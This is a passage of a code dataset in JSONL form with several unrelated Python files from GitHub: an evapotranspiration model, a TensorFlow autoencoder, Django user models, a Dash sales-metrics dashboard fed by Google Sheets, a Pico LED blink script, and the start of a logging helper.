inpt):\n '''\n Returns radiation, energy balance, various temperatures and output\n parameters\n '''\n self.inpt = inpt\n self.sol = self.inpt[\"solar\"]\n self.rn = 0\n self.u = self.inpt[\"wind\"]\n self.airT = self.inpt[\"airt\"]\n self.vp = self.inpt[\"vp\"]\n self.index = self.sfcs.index(self.inpt['sfc'])\n self.rs = self.inpt[\"rs\"]\n self.albedo = self.srftype[str(self.inpt['sfc'])]['albedo']\n self.reflectedS = self.albedo * self.sol\n self.ra = self.c_ra(self.inpt['sfc'])\n self.nets = self.c_netShortwave()\n self.netl = self.c_netLongwave()\n # 9999 Uses surface Air T not true surface T\n self.LUP = 0.95 * self.stefanC * math.pow(self.airT + self.absZero, 4) \n self.LDOWN = self.LUP - self.netl\n self.rn = self.c_netRadiation()\n self.svp = self.c_satVapPres(self.airT)\n self.Tw = self.wetbulb()\n self.esTw = self.c_satVapPres(self.Tw)\n self.Td = self.dewpoint()\n self.esTd = self.c_satVapPres(self.Td)\n self.rh =self.c_rh()\n if self.rh <100:\n self.delta = self.c_delta()\n if self.vp >= self.svp:\n self.vp = self.svp\n self.vpd = self.svp - self.vp\n self.LE = (self.delta * self.rn + self.rho * self.cp * (self.svp - self.vp)/self.ra)\\\n / (self.delta + self.gamma * (1 + self.rs / self.ra))\n self.G = 0.1 * self.rn\n self.H = self.rn - self.LE - self.G\n self.mmPerDay = self.LE * 0.035\n self.tlist = [self.airT + 273.15, self.Tw + 273.15, self.Td + 273.15, self.svp, self.vp, self.esTw, self.esTd]\n self.rblist = [self.sol, self.reflectedS, self.LDOWN, self.LUP]\n self.eblist = [self.rn, self.H, self.LE, self.G]\n self.olist = [self.rs, self.rh, self.LE, self.ra]\n return self.rblist, self.eblist, self.tlist, self.olist\n\n def c_netShortwave(self):\n '''\n calculates net shortwave radiation\n '''\n return (1 - self.srftype[str(self.inpt['sfc'])]['albedo']) * self.sol\n\n def c_netLongwave(self):\n '''\n calculates net longwave radiation at surface\n using eqn 4.22 in MORECS and clear skies !\n '''\n factor = 0.95 * self.stefanC * math.pow(self.airT + self.absZero, 4)\n return factor * (1.28 * (math.pow(self.vp / (self.airT + self.absZero), 0.142857))-1)\n \n def c_netRadiation(self):\n '''\n calculates net all-wave radiation\n '''\n return self.nets + self.netl\n \n def c_satVapPres(self, airT):\n '''\n calculates saturation vapour pressure (mbar)\n '''\n return 10 * math.exp(self.c2_svp - ((self.c1_svp / (airT + self.absZero)) +\n self.c3_svp * math.log(airT + self.absZero)))\n\n def c_rh(self):\n '''\n calculates relative humidity\n '''\n if self.vp >= self.svp:\n return 100.0\n else:\n return (self.vp / self.svp) * 100\n\n def c_delta(self):\n '''\n calculates slope of svp curve\n '''\n tup = self.airT + 0.5 # add half a degree to air temperature\n tlo = self.airT - 0.5 # subtract half a degree from air temperature\n return self.c_satVapPres(tup) - self.c_satVapPres(tlo)\n \n def dewpoint(self):\n '''\n return dewpoint\n '''\n factor = math.log(self.vp / 6.112)\n return 243.5 * factor/(17.67-factor)\n\n \n def wetbulb(self):\n '''\n # Wet bulb from http://www.the-snowman.com/wetbulb2.html\n '''\n self.rh = (self.vp / self.svp) * 100\n return (-5.806 + 0.672 * self.airT - 0.006 * self.airT * self.airT +\n (0.061 + 0.004 * self.airT + 0.000099 * self.airT * self.airT) *\n self.rh + (-0.000033 - 0.000005 * self.airT\n - 0.0000001 * self.airT * self.airT) * self.rh * self.rh)\n","repo_name":"edinumet/pmont","sub_path":"src/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":8308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21329864116","text":"\n# coding: utf-8\n\n# In[ ]:\n\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.contrib.rnn import LSTMCell\n\nclass Autoencoder_Time():\n def __init__(self, config):\n #Hyperparameters\n num_layers = config['num_layers']\n hidden_size = config['hidden_size']\n max_grad_norm = config['max_grad_norm']\n batch_size = config['batch_size']\n sl = config['sl']\n crd = config['crd']\n num_l = config['num_l']\n learning_rate = config['learning_rate']\n self.sl = sl\n self.batch_size = batch_size\n\n #Nodes for input variable\n self.x = tf.placeholder('float', shape = [batch_size, sl], name = 'Input_data')\n self.x_exp = tf.expand_dims(self.x, 1)\n self.keep_prob = tf.placeholder('float')\n\n #Encoder cell, multi-layered with dropout\n with tf.variable_scope('Encoder') as scope:\n cell_enc = tf.contrib.rnn.MultiRNNCell([LSTMCell(hidden_size) for _ in range(num_layers)])\n cell_enc = tf.contrib.rnn.DropoutWrapper(cell_enc, output_keep_prob = self.keep_prob)\n \n #Initial state\n initial_state_enc = cell_enc.zero_state(batch_size, tf.float32)\n \n #Layer for mean of z\n W_mu = tf.get_variable('W_mu', [hidden_size, num_l])\n outputs_enc, _ = tf.contrib.rnn.static_rnn(cell_enc, inputs = tf.unstack(self.x_exp, axis = 2), initial_state = initial_state_enc) \n cell_output = outputs_enc[-1]\n b_mu = tf.get_variable('b_mu', [num_l])\n self.z_mu = tf.nn.xw_plus_b(cell_output, W_mu, b_mu, name = 'z_mu')\n \n #Train the point in latent space to have zero mean and unit variance on batch basis\n lat_mean, lat_var = tf.nn.moments(self.z_mu, axes = [1])\n self.loss_lat_batch = tf.reduce_mean(tf.square(lat_mean) + lat_var - tf.log(lat_var) - 1)\n \n\n #Layers to generate initial state\n with tf.name_scope(\"Lat_2_dec\") as scope:\n W_state = tf.get_variable('W_state', [num_l, hidden_size])\n b_state = tf.get_variable('b_state', [hidden_size])\n z_state = tf.nn.xw_plus_b(self.z_mu, W_state, b_state, name = 'z_state')\n \n\n #Decoder cell, multi-layered\n with tf.variable_scope(\"Decoder\") as scope:\n cell_dec = tf.contrib.rnn.MultiRNNCell([LSTMCell(hidden_size) for _ in range(num_layers)])\n \n #Initial state\n initial_state_dec = tuple([(z_state, z_state)] * num_layers)\n dec_inputs = [tf.zeros([batch_size, 1])] * sl\n outputs_dec, _ = tf.contrib.rnn.static_rnn(cell_dec, inputs = dec_inputs, initial_state = initial_state_dec)\n \n \n with tf.name_scope(\"Out_layer\") as scope:\n params_o = 2*crd\n W_o = tf.get_variable('W_o', [hidden_size, params_o])\n b_o = tf.get_variable('b_o', [params_o])\n outputs = tf.concat(outputs_dec, axis = 0)\n h_out = tf.nn.xw_plus_b(outputs, W_o, b_o)\n h_mu, h_sigma_log = tf.unstack(tf.reshape(h_out, [sl, batch_size, params_o]), axis = 2)\n h_sigma = tf.exp(h_sigma_log)\n dist = tf.contrib.distributions.Normal(h_mu, h_sigma)\n px = dist.log_prob(tf.transpose(self.x))\n loss_seq = -px\n self.loss_seq = tf.reduce_mean(loss_seq)\n \n \n with tf.name_scope(\"train\") as scope:\n #Use learning rate deacy\n global_step = tf.Variable(0, trainable = False)\n lr = tf.train.exponential_decay(learning_rate, global_step, 1000, 0.1, staircase = False)\n \n self.loss = self.loss_seq + self.loss_lat_batch\n \n \n tvars = tf.trainable_variables()\n grads = tf.gradients(self.loss, tvars)\n grads, _ = tf.clip_by_global_norm(grads, max_grad_norm) #Gradient clipping to prevent explosion\n self.numel = tf.constant([[0]])\n \n #Apply the gradients\n optimizer = tf.train.AdamOptimizer(lr)\n gradients = zip(grads, tvars)\n self.train_step = optimizer.apply_gradients(gradients, global_step = global_step)\n self.numel = tf.constant([[0]])\n \n \n tf.summary.tensor_summary('lat_state', self.z_mu)\n self.merged = tf.summary.merge_all()\n self.init_op = tf.global_variables_initializer()\n\n","repo_name":"vishaltheone1/Weld-Joint-Strength-Prediction","sub_path":"Autoencoder_method.py","file_name":"Autoencoder_method.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10699409033","text":"from django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\n\nclass UserInterest(models.Model):\n email = models.EmailField(_('email address'))\n\nclass CustomUser(AbstractUser):\n MALE = 'm'\n FEMALE = 'f'\n NONBINARY = 'n'\n GENDER_CHOICES = [\n (MALE, 'Male'),\n (FEMALE, 'Female'),\n (NONBINARY, 'Non-Binary')\n ]\n\n METRIC = 'm'\n IMPERIAL = 'i'\n SYSTEMS = [\n (METRIC, 'Metric'),\n (IMPERIAL, 'Imperial'),\n ]\n\n EVERYONE = 'e'\n REGISTERED_USERS = 'r'\n FOLLOWERS = 'f'\n OWN_USER = 'u'\n\n VISIBILITIES = [\n (EVERYONE, 'Everyone'),\n (REGISTERED_USERS, 'Registered users'),\n (FOLLOWERS, 'Followers'),\n (OWN_USER, 'Own user')\n ]\n\n NOVICE = 'n'\n INTERMEDIATE = 'i'\n ADVANCED = 'a'\n TIERS = [\n (NOVICE, 'Novice'),\n (INTERMEDIATE, 'Intermediate'),\n (ADVANCED, 'Advanced'),\n ]\n\n email = models.EmailField(unique=True)\n\n gender = models.CharField(max_length=1, null=True, choices=GENDER_CHOICES)\n year_birth = models.IntegerField(null=True)\n month_birth = models.IntegerField(null=True)\n system = models.CharField(max_length=1, choices=SYSTEMS, default=METRIC)\n location = models.CharField(max_length=200, null=True, blank=True)\n biography = models.TextField(null=True, blank=True)\n profile_filename = models.CharField(max_length=1024, null=True)\n default_weight_unit = models.IntegerField(default=1)\n default_speed_unit = models.IntegerField(default=11)\n default_distance_unit = models.IntegerField(default=5)\n # KCAL = 15\n default_energy_unit = models.IntegerField(default=15)\n\n default_visibility_workouts = models.CharField(max_length=1, choices=VISIBILITIES, default=EVERYONE)\n default_visibility_user_bio_datas = models.CharField(max_length=1, choices=VISIBILITIES, default=EVERYONE)\n\n visibility = models.CharField(max_length=1, choices=VISIBILITIES, default=EVERYONE)\n\n follow_approval_required = models.BooleanField(default=False)\n\n followers = models.ManyToManyField(\"self\", related_name='user_followers', blank=True, symmetrical=False)\n following = models.ManyToManyField(\"self\", related_name='user_following', blank=True, symmetrical=False)\n blocked_users = models.ManyToManyField(\"self\", related_name='user_blocked', blank=True, symmetrical=False)\n blocked_by = models.ManyToManyField(\"self\", related_name='user_blocked_by', blank=True, symmetrical=False)\n follower_requests = models.ManyToManyField(\"self\", related_name='user_follower_requests', blank=True, symmetrical=False)\n followers_number = models.IntegerField(default=0)\n followings_number = models.IntegerField(default=0)\n\n tier = models.CharField(max_length=1, choices=TIERS, default=NOVICE)\n\n experience = models.IntegerField(default=1000)\n level = models.IntegerField(default=1)\n primary_class = models.CharField(max_length=200, null=True, default='Athlete')\n secondary_class = models.CharField(max_length=200, null=True)\n primary_class_computed = models.CharField(max_length=200, null=True, default='Athlete')\n secondary_class_computed = models.CharField(max_length=200, null=True)\n\n custom_class = models.BooleanField(default=False)\n\n def __str__(self):\n return self.username\n\nclass File(models.Model):\n file = models.ImageField(blank=False, null=False)\n user = models.ForeignKey(CustomUser, related_name='user_file', null=True, on_delete=models.CASCADE)\n\n def __str__(self):\n return self.file.name\n\nclass UserDataRequest(models.Model):\n user = models.ForeignKey(CustomUser, related_name='user_data_request', on_delete=models.CASCADE)\n","repo_name":"t-recx/sukuwatto","sub_path":"backend/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"38596414488","text":"# =============================== #\n\nimport locale\nfrom oauth2client.service_account import ServiceAccountCredentials\nimport gspread\nimport pandas as pd\nimport plotly.graph_objects as go\nimport plotly.figure_factory as ff\nimport dash_bootstrap_components as dbc\nfrom dash import html, dcc, Output, Input\nfrom app import app\nimport dash\n\n# =============================== #\nlocale.setlocale(locale.LC_ALL, 'pt_BR.utf8') \n\nscope = [\"https://spreadsheets.google.com/feeds\", \"https://www.googleapis.com/auth/spreadsheets\", \"https://www.googleapis.com/auth/drive\"]\ncredentials = ServiceAccountCredentials.from_json_keyfile_name('arquivojson.json', scope)\nclient = gspread.authorize(credentials)\nspreadsheet = client.open_by_key('chave-planilha')\nsheet = spreadsheet.get_worksheet(0)\nvalues = sheet.get_all_values()\nsublistas_selecionadas = values[2:]\n\n# =============================== #\n\ndf = pd.DataFrame()\nfor sublista in sublistas_selecionadas:\n if len(sublista) > 0: \n nome_coluna = sublista[0]\n valores_coluna = sublista[1:] \n df[nome_coluna] = valores_coluna\n \nlista1 = sublistas_selecionadas[0]\n\nlista2 = sublistas_selecionadas[1]\nsolicitacoes_retencao = lista2[:4]\nrenovaram_financeiro = lista2[9:]\n\nlista3 = sublistas_selecionadas[2]\ncancelados_retencao = lista3[:4]\nnao_pagou_financeiro = lista3[9:]\n\nlista4 = sublistas_selecionadas[3]\nrevertidos_retencao = lista4[:4]\nrenovou_downsol_financeiro = lista4[9:]\n\nlista5 = sublistas_selecionadas[4]\nmrr_revertido_retencao = lista5[:4] \ncancelou_retencao_financeiro = lista5[9:]\n\nlista6 = sublistas_selecionadas[5]\nmrr_cancelado_retencao = lista6[:4] \nmrr_renovado_financeiro = lista6[9:]\n\nlista7 = sublistas_selecionadas[6]\nmrr_revertidoHS_retencao = lista7[:4] \nmrr_renovado_downsel_financeiro = lista7[9:]\n\nlista8 = sublistas_selecionadas[7]\nporcentag_reversao_retencao = lista8[:4] \nmrr_nao_pago_financeiro = lista8[9:]\n\nlista9 = sublistas_selecionadas[8]\nupsell_mrr_retencao = lista9[:4] \nmrr_cancelou_financeiro = lista9[9:] \n\nlista10 = sublistas_selecionadas[9]\ntotal_mrr_retencao = lista10[:4] \nmrr_certificados_vencidos_financeiro = lista10[9:] \n\nlista12 = sublistas_selecionadas[10]\nnegociacoes_pagas_mrr = lista12[9:] \n\nlista13 = sublistas_selecionadas[11]\nnegociacoes_nao_pagas_mrr = lista13[9:] \n\nlista16 = sublistas_selecionadas[12]\ntotal_MRR_feito = lista16[9:] \n\nlista14 = sublistas_selecionadas[13]\ndescontos_renovacoesARR_financeiro = lista14[9:] \n\nlista15 = sublistas_selecionadas[14]\ndescontos_renovacoesMRR_financeiro = lista15[9:] \n\n# ============= Financeiro ================== #\n\nlistas = [renovaram_financeiro, nao_pagou_financeiro, renovou_downsol_financeiro,\n cancelou_retencao_financeiro, mrr_renovado_financeiro,\n mrr_renovado_downsel_financeiro, mrr_nao_pago_financeiro,\n mrr_cancelou_financeiro, mrr_certificados_vencidos_financeiro, negociacoes_pagas_mrr,\n negociacoes_nao_pagas_mrr, total_MRR_feito,\n descontos_renovacoesARR_financeiro,descontos_renovacoesMRR_financeiro]\nlistas_resultantes = []\n\nfor lista in listas: \n primeiros_elementos = lista[1:4]\n listas_resultantes.append(primeiros_elementos)\n \ndf_financeiro = pd.DataFrame({'Renovaram': listas_resultantes[0],\n 'Não Pagou': listas_resultantes[1],\n 'Renovou com Downsell': listas_resultantes[2],\n 'Cancelou': listas_resultantes[3],\n 'MRR renovado': listas_resultantes[4],\n 'MRR renovado com Downsell': listas_resultantes[5],\n 'MRR não pago': listas_resultantes[6],\n 'MRR cancelou': listas_resultantes[7],\n 'MRR - Certificados vencidos': listas_resultantes[8],\n 'Negociações pagas - Em MRR': listas_resultantes[9],\n 'Negociações não pagas - Em MRR': listas_resultantes[10],\n 'Total de MRR feito': listas_resultantes[11],\n 'Desconto dado para as renovações - ARR': listas_resultantes[12],\n 'Desconto dado para as renovações - MRR': listas_resultantes[13]})\nnomes = ['Pessoa1', 'Pesso2', 'Pessoa3']\ndf_financeiro.insert(0, 'Nome', nomes)\n\ncolunas_monetarias = ['MRR renovado', 'MRR renovado com Downsell', 'MRR não pago', 'Renovou com Downsell',\n 'MRR cancelou', 'Negociações pagas - Em MRR', 'Negociações não pagas - Em MRR',\n 'MRR - Certificados vencidos', 'Total de MRR feito', 'Desconto dado para as renovações - ARR', 'Desconto dado para as renovações - MRR']\n\nfor coluna in colunas_monetarias:\n df_financeiro[coluna] = df_financeiro[coluna].str.replace('R\\$ ', '', regex=True)\n df_financeiro[coluna] = df_financeiro[coluna].str.replace('.', '').str.replace(',', '.', regex=True)\nfor coluna in colunas_monetarias:\n df_financeiro[coluna] = pd.to_numeric(df_financeiro[coluna], errors='coerce')\ndf_financeiro = df_financeiro.fillna(0)\n\n# ============== Retenção ================= #\n\nlistas_retencao = [solicitacoes_retencao, cancelados_retencao,\n revertidos_retencao, mrr_revertido_retencao,\n mrr_cancelado_retencao, mrr_revertidoHS_retencao,\n porcentag_reversao_retencao, upsell_mrr_retencao, total_mrr_retencao]\nlistas_resultantes_retencao = []\n\nfor lista in listas_retencao: # para cada lista\n primeiros_elementos = lista[1:4] # selecionar apenas o elemento 0 ao 4\n listas_resultantes_retencao.append(primeiros_elementos) # junta os elementos em uma lista\n\ndf_retencao = pd.DataFrame({'Solicitações': listas_resultantes_retencao[0],\n 'Cancelados': listas_resultantes_retencao[1],\n 'Revertidos': listas_resultantes_retencao[2],\n 'MRR Revertido': listas_resultantes_retencao[3],\n 'MRR Cancelado': listas_resultantes_retencao[4],\n 'MRR revertido HS': listas_resultantes_retencao[5],\n '% de reversão': listas_resultantes_retencao[6],\n 'Upsell MRR': listas_resultantes_retencao[7],\n 'Total MRR Retenção': listas_resultantes_retencao[8],})\nnomes = ['Pessoa4', 'Pessoa5', 'Pesssoa6']\ndf_retencao.insert(0, 'Nome', nomes)\ndf_retencao.fillna(0)\n\ncolunas_monetarias2 = ['MRR Revertido', 'MRR Cancelado', 'MRR revertido HS', 'Upsell MRR', 'Total MRR Retenção']\n\nfor coluna in colunas_monetarias2:\n df_retencao[coluna] = df_retencao[coluna].str.replace('R\\$ ', '', regex=True)\n df_retencao[coluna] = df_retencao[coluna].str.replace('.', '').str.replace(',', '.', regex=True)\nfor coluna in colunas_monetarias2:\n df_retencao[coluna] = pd.to_numeric(df_retencao[coluna], errors='coerce')\n df_retencao.fillna(0)\n\ndf_retencao = df_retencao.fillna(0)\n\ndf_retencao['% de reversão'] = [value.replace(\"%\", \"\").replace(\".\", \",\") for value in df_retencao['% de reversão']]\ndf_retencao['% de reversão'] = [\n float(value.replace(\",\", \".\")) if value else None\n for value in df_retencao['% de reversão']\n]\ndf_retencao['Reversão do Time'] = (df_retencao['% de reversão'].sum() / 3).round(2)\n\n\n# ============== Somatório das variáveis ================= #\n\nsoma_mrr_feito_retencao = df_retencao['Total MRR Retenção'].sum() # soma total retenção\nsoma_mrr_feito_retencao1 = soma_mrr_feito_retencao.round(2) # arredondamento em 2\nsoma_mrr_feito_retencao1 = '{:,.2f}'.format(soma_mrr_feito_retencao1).replace(',', ' ').replace('.', ',').replace(' ', '.') # substituições\nsoma_mrr_feito_retencao1 = f'R$ {soma_mrr_feito_retencao1}' #formata adicionando R$ na frente \n\nreversao_retencao = df_retencao['Reversão do Time'][1] \nreversao_retencao = f\"{reversao_retencao} %\"\n\nmrr_revertido_financeiro = df_financeiro['Total de MRR feito'].sum() # soma total financeiro\nmrr_revertido_financeiro = round(mrr_revertido_financeiro, 2) # arredondamento em 2\nmrr_revertido_financeiro = '{:,.2f}'.format(mrr_revertido_financeiro).replace(',', ' ').replace('.', ',').replace(' ', '.') # substituições\nmrr_revertido_financeiro = f'R$ {mrr_revertido_financeiro}' #formata adicionando R$ na frente \n\n# ================================= #\n\nsolicitacoes_ret = df_retencao['Solicitações'].astype(int).sum()\ncancelados_ret = df_retencao['Cancelados'].astype(int).sum()\nrevertidos_ret = df_retencao['Revertidos'].astype(int).sum()\nmrr_revertido_ret = df_retencao['MRR Revertido'].sum()\nmrr_revertido_ret = mrr_revertido_ret.round(2)\nmrr_cancelado_ret = df_retencao['MRR Cancelado'].sum()\nmrr_cancelado_ret = mrr_cancelado_ret.round(2)\nmrr_revertido_hs_ret = df_retencao['MRR revertido HS'].sum()\nmrr_revertido_hs_ret = mrr_revertido_hs_ret.round(2)\nupsell_mrr_ret = df_retencao['Upsell MRR'].sum()\nupsell_mrr_ret = upsell_mrr_ret.round(2)\ntotal_mrr_ret = df_retencao['Total MRR Retenção'].sum()\ntotal_mrr_ret = total_mrr_ret.round(2)\n\ndata_retencao = {\n 'MRR': [\"Total MRR Retenção\", \"MRR revertido HS\", \"MRR Revertido\", \"MRR Cancelado\", \"Upsell MRR\"],\n 'Valor': [total_mrr_ret, mrr_revertido_hs_ret, mrr_revertido_ret, mrr_cancelado_ret, upsell_mrr_ret],\n 'Cor': ['#04ad43', '#04ad43', '#04ad43', '#f50909', '#04ad43'] # Cores específicas\n}\n\ndata_retencao_sorted = sorted(zip(data_retencao['MRR'], data_retencao['Valor'], data_retencao['Cor']), key=lambda x: x[1], reverse=True)\ndata_retencao['MRR'] = [item[0] for item in data_retencao_sorted]\ndata_retencao['Valor'] = [item[1] for item in data_retencao_sorted]\ndata_retencao['Cor'] = [item[2] for item in data_retencao_sorted]\n\n# ========= Gráfico Geral Retenção - 1 =========== #\n\nfig_retencao = go.Figure()\nfor mrr, valor, cor in zip(data_retencao['MRR'], data_retencao['Valor'], data_retencao['Cor']):\n fig_retencao.add_trace(go.Bar(\n x=[valor],\n y=[mrr],\n orientation='h',\n marker={\"color\": cor},\n hoverinfo=\"none\"\n ))\nfig_retencao.update_layout(\n height=400,\n width=700,\n template=\"plotly_white\",\n margin={\"l\": 20, \"r\": 20, \"t\": 20, \"b\": 20},\n xaxis={\"showticklabels\": False}\n)\nfig_retencao.update_yaxes(tickfont=dict(size=18, color='black'))\nfor data_index, bar in enumerate(fig_retencao.data):\n x_value = bar.x[0]\n y_value = bar.y[0]\n fig_retencao.add_annotation(\n x=x_value + 400, # Ajuste horizontal da posição do texto\n y=y_value,\n text=f\"{x_value:.2f}\", # Formatação do valor com duas casas decimais\n showarrow=False, # Não mostrar seta\n font=dict(size=18, color=\"black\", family=\"Arial, sans-serif\") # Estilo da fonte do texto\n )\nfig_retencao.update_xaxes(tickformat=\".2f\")\nfig_retencao.update_layout(showlegend=False) # Remove a legenda\nfig_retencao.update_xaxes(showgrid=False)\nfig_retencao.update_yaxes(showgrid=False)\n\n# ========= Tabelas =========== #\n\ndata_matrix = [['% de Reversão', 'Solicitações', 'Cancelados', 'Revertidos']]\npercentage_value = df_retencao[df_retencao['Nome'] == 'Pessoa1']['% de reversão'].iloc[0]\nformatted_percentage = f\"{percentage_value / 1:.2f}%\"\n\nfig_matrix.append([\n formatted_percentage,\n df_retencao[df_retencao['Nome'] == 'Pessoa1']['Solicitações'].iloc[0],\n df_retencao[df_retencao['Nome'] == 'Pessoa1']['Cancelados'].iloc[0],\n df_retencao[df_retencao['Nome'] == 'Pessoa1']['Revertidos'].iloc[0]])\n\ncolorscale = [[0, '#ab1216'],[.5, '#8a8a8a'],[1, '#e5e5e5']]\nfig_matrix = ff.create_table(data_matrix, height_constant=20, colorscale=colorscale)\nfig_matrix.layout.width=600\nfor i in range(len(fig_matrix.layout.annotations)):\n fig_matrix.layout.annotations[i].font.size = 18\n\n# ========= Layout =========== #\nlayout = dbc.Col([\n dbc.Row([\n dbc.Col([\n dbc.CardGroup([\n dbc.Card([\n html.Legend('MRR revertido Retenção', style={'font-weight': 'bold', 'color': 'black'}),\n html.H5(soma_mrr_feito_retencao1, id='p-saldo-dashboards', style={'font-weight': 'bold', 'font-size':'25px', 'color':'rgb(235, 50, 55)'})\n ], style={'padding-left': '20px', 'padding-top': '10px'}),\n dbc.Card(\n html.Div(className='fa fa-line-chart ', style=card_icon),\n color= 'black',\n style={'maxWidth': 75, 'height': 100, 'margin-left': '-10px'}\n )\n ])\n ], width=4),\n\n dbc.Col([ \n dbc.CardGroup([\n dbc.Card([\n html.Legend('Reversão do time de Retenção', style={'font-weight': 'bold', 'color': 'black'}),\n html.H5(reversao_retencao, id='p-receita-dashboards', style={'font-weight': 'bold', 'font-size':'25px', 'color':'rgb(235, 50, 55)'})\n ], style={'padding-left': '20px', 'padding-top': '10px'}),\n dbc.Card(\n html.Div(className='fa fa-line-chart ', style=card_icon),\n color= 'black',\n style={'maxWidth': 75, 'height': 100, 'margin-left': '-10px'}\n )\n ])\n ], width=4),\n \n dbc.Col([ \n dbc.CardGroup([\n dbc.Card([\n html.Legend('MRR Revertido Financeiro', style={'font-weight': 'bold', 'color': 'black'}),\n html.H5(mrr_revertido_financeiro, id='p-despesa-dashboards', style={'font-weight': 'bold', 'font-size':'25px', 'color':'rgb(235, 50, 55)'})\n ], style={'padding-left': '20px', 'padding-top': '10px'}),\n dbc.Card(\n html.Div(className='fa fa-line-chart ', style=card_icon),\n color= 'black',\n style={'maxWidth': 75, 'height': 100, 'margin-left': '-10px'}\n )\n ])\n ], width=4),\n ], style={'margin': '30px'}),\n \n dbc.Row([ \n dbc.Col([\n dbc.CardGroup([\n dbc.Card([\n html.Label(\"Período de análise\", style={\"margin-top\": \"10px\"}),\n dcc.Dropdown(\n id=\"dropdown-despesa\",\n clearable=False,\n style={\"width\": \"100%\"},\n persistence=True,\n persistence_type=\"session\",\n multi=True\n )\n ], style={'height':\"70%\", 'padding': '20px', 'margin-left': '30px'})\n ])\n ], width=4),\n dbc.Col([\n dbc.Button(\"Pessoa1\", id='img-pessoa-1', className='teste1', n_clicks=0),\n dbc.Button(\"Pessoa2\", id='img-pessoa-2', className='teste1', n_clicks=0),\n dbc.Button(\"Pessoa3\", id='img-pessoa-3',className='teste1', n_clicks=0),\n dbc.Button(\"Pessoa4\", id='img-pessoa-4',className='teste1', n_clicks=0),\n dbc.Button(\"Pessoa5\", id='img-pessoa-5', className='teste1', n_clicks=0),\n dbc.Button(\"Pessoa6\", id='img-pessoa-6',className='teste1', n_clicks=0),\n ], className = 'teste2'),\n ]),\n dbc.Row([\n dbc.Col(\n dbc.Card(dcc.Graph(id='graph2'), style={'padding-left': '30px', 'width': '100%'}), width=6),\n dbc.Col([\n dbc.Card(dcc.Graph(id='graph3'), style={'margin-left': '50px', 'margin-top': '30px', 'width': '100%'}),\n dbc.Card(dcc.Graph(id='graph4'), style={'margin-left': '50px', 'margin-top': '30px', 'width': '100%'}),\n ], width=6),\n])\n])\n\n@app.callback(\n [Output('img-pessoa-1', 'className'),\n Output('img-pessoa-2', 'className'),\n Output('img-pessoa-3', 'className'),\n Output('img-pessoa-4', 'className'),\n Output('img-pessoa-5', 'className'),\n Output('img-pessoa-6', 'className'),\n Output('graph2', 'figure'),\n Output('graph3', 'figure'),\n Output('graph4', 'figure')], \n [Input('img-pessoa-1', 'n_clicks'),\n Input('img-pessoa-2', 'n_clicks'),\n Input('img-pessoa-3', 'n_clicks'),\n Input('img-pessoa-4', 'n_clicks'),\n Input('img-pessoa-5', 'n_clicks'),\n Input('img-pessoa-6', 'n_clicks')],\n prevent_initial_call=True\n)\n\ndef update_card(img1, img2, img3, img4, img5, img6):\n figura = go.Figure()\n figura2 = go.Figure()\n figura3 = go.Figure()\n\n changed_id = [p['prop_id'] for p in dash.callback_context.triggered][0]\n \n class_pessoa1, class_pessoa2, class_pessoa3, class_pessoa4, class_pessoa5, class_pessoa6 = \\\n 'teste1', 'teste1', 'teste1', 'teste1', 'teste1', 'teste1'\n\n if 'img-pessoa-1' in changed_id:\n figura = fig_pessoa1\n figura2 = fig_pessoa11\n figura3 = data_matrix\n class_pessoa1 = 'teste1-active'\n elif 'img-pessoa-2' in changed_id:\n figura = fig_pessoa2\n figura2 = fig_pessoa22\n figura3 = data_matrix\n class_pessoa2 = 'teste1-active'\n elif 'img-pessoa-3' in changed_id:\n figura = fig_pessoa3\n figura2 = fig_pessoa33\n figura3 = data_matrix\n class_pessoa3 = 'teste1-active'\n elif 'img-pessoa-4' in changed_id:\n figura = fig_pessoa4\n figura2 = fig_pessoa44\n figura3 = fig_pessoa444\n class_pessoa4 = 'teste1-active'\n elif 'img-pessoa-5' in changed_id:\n figura = fig_pessoa5\n figura2 = fig_pessoa55\n figura3 = fig_pessoa555\n class_pessoa5 = 'teste1-active'\n elif 'img-pessoa-6' in changed_id:\n figura = fig_pessoa6\n figura2 = fig_pessoa66\n figura3 = fig_pessoa666\n class_pessoa6 = 'teste1-active'\n\n return class_pessoa1, class_pessoa2, class_pessoa3, class_pessoa4, class_pessoa5, class_pessoa6, figura, figura2, figura3\n\n","repo_name":"BEATRIZBUFFON/Web-Scraping-eGestor","sub_path":"folder/gspread-planilha.py","file_name":"gspread-planilha.py","file_ext":"py","file_size_in_byte":17569,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19296525396","text":"from machine import Pin, Timer\n\n# Red on the tiny Pico\nrgbRed = Pin(18, Pin.OUT)\n# Green on the tiny Pico\nrgbGreen = Pin(19, Pin.OUT)\n# Blue on the tiny Pico\nrgbBlue = Pin(20, Pin.OUT)\n\n# from https://github.com/raspberrypi/pico-micropython-examples/blob/master/blink/blink.py\n\n# always Green on the (standard) Pico\nled = Pin(25, Pin.OUT)\n\ntimer = Timer()\ndef tick(timer):\n global led\n led.toggle()\n\ntimer.init(freq=1, mode=Timer.PERIODIC, callback=tick)\n","repo_name":"unPi-ro/sonar.glass","sub_path":"examples/all_pico_leds.py","file_name":"all_pico_leds.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34274079490","text":"\nfrom os import write\nfrom pymongo import MongoClient\n\ndef writeLog_exception_noEle(item):\n # testing func: write the scraping data to a txt\n # INPUT: scraping array\n with open(\"scholarship_log.txt\", \"a+\", encoding=\"utf-8\") as writer:\n writer.write(str(item) + \"\\n\")\n writer.write(\n \"==================================================================================================\\n\\n\")\n writer.close()\n\n\ndef writeLog_scrapped_data(item):\n # testing func: write the scraping data to a txt\n # INPUT: scraping array\n with open(\"test_output.txt\", \"a+\", encoding=\"utf-8\") as writer:\n for x in item:\n writer.write(str(x) + \"\\n\")\n\n writer.write(\"======================================\\n\\n\")\n writer.close()\n\n\ndef write_collegeData(item):\n with 